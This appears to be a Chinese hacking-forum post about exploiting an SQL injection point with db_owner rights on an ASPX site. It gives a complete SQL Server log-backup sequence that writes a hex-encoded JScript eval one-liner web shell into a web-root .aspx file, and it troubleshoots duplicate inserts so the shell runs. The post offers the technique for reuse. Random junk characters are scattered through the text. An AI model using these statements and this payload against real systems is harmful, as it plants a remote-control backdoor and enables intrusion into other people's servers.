最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
- w. {1 _8 l% m* T9 a9 @但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。; y& E4 Y4 V7 n
经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。7 f, ^8 b2 F9 h9 l, v
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。* _( ?) z0 _. z# `& |3 N' s
8 S; F5 L3 s5 n
--------------------------------------------------------------
+ c, C, r1 Y7 `, [. P6 A今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
6 K5 y( r O; X3 c' A5 _; K自己修改备份语句如下:
4 N2 B0 }, j/ H6 W& m$ U6 K, dDrop table cmd;--
* C6 O$ I' p0 u% C+ E& g! Zalter database db_test set RECOVERY FULL;--7 R* _0 N8 E( N
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段6 Q0 T+ Z8 T2 B) d5 o
backup log db_test to disk = 'c:\bak' with init;--, V& M5 B- @( \6 h" O D
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--2 z% G; l! @7 v
delete from cmd where id>1;--删除id>1的数据
! A! Y" `/ l4 x. Tbackup log db_test to disk = 'e:\webroot\test.aspx';--+ l/ U* D3 b2 E' m1 r/ X
Drop table cmd;--
: J" T) N6 j: s8 i0 a希望对大家有用。 |